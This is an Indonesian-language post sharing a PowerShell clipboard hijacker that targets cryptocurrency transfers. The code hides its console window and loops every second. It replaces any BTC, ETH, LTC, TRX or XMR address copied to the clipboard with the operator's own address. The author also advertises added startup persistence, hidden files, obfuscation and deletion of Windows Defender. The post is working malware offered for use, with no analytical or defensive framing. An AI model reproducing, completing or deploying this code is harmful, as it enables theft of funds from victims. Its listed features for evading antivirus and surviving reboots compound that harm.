Ini adalah skrip PowerShell untuk pembajak clipboard khusus untuk crypto. (jangan bodoh untuk menjalankan pws ini di sistem utama Anda, gunakan VM)
hal-hal yang saya tambahkan sebagai berikut
- Fix registry startup
- Add hidden attributes
- Add drop to temp with random 15 char name
- Add obfuscation
- Add delete windows 10 defender
- Add to be able to set the execution policy as unrestricted upon running the clipper
Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public static void Hide()
{
IntPtr hWnd = GetConsoleWindow();
if(hWnd != IntPtr.Zero)
{
ShowWindow(hWnd, 0);
}
}
'
[Console.Window]::Hide()
$addy = @{
"BTC" = "Your btc addy"
"ETH" = "Your eth addy"
"LTC" = "Your ltc addy"
"TRX" = "Your trx addy"
"XMR" = "Your xmr addy"
}
while ($true) {
$clipper = Get-Clipboard
if ($clipper -match "^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$") {
$clipper = $addy["BTC"]
[System.Windows.Forms.Clipboard]::SetText($clipper)
}
elseif ($clipper -match "^0x[a-fA-F0-9]{40}$") {
$clipper = $addy["ETH"]
[System.Windows.Forms.Clipboard]::SetText($clipper)
}
elseif ($clipper -match "^[LM][a-km-zA-HJ-NP-Z1-9]{26,33}$") {
$clipper = $addy["LTC"]
[System.Windows.Forms.Clipboard]::SetText($clipper)
}
elseif ($clipper -match "^T[a-zA-HJ-NP-Z0-9]{33}$") {
$clipper = $addy["TRX"]
[System.Windows.Forms.Clipboard]::SetText($clipper)
}
elseif ($clipper -match "^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$") {
$clipper = $addy["XMR"]
[System.Windows.Forms.Clipboard]::SetText($clipper)
}
Start-Sleep -Seconds 1
}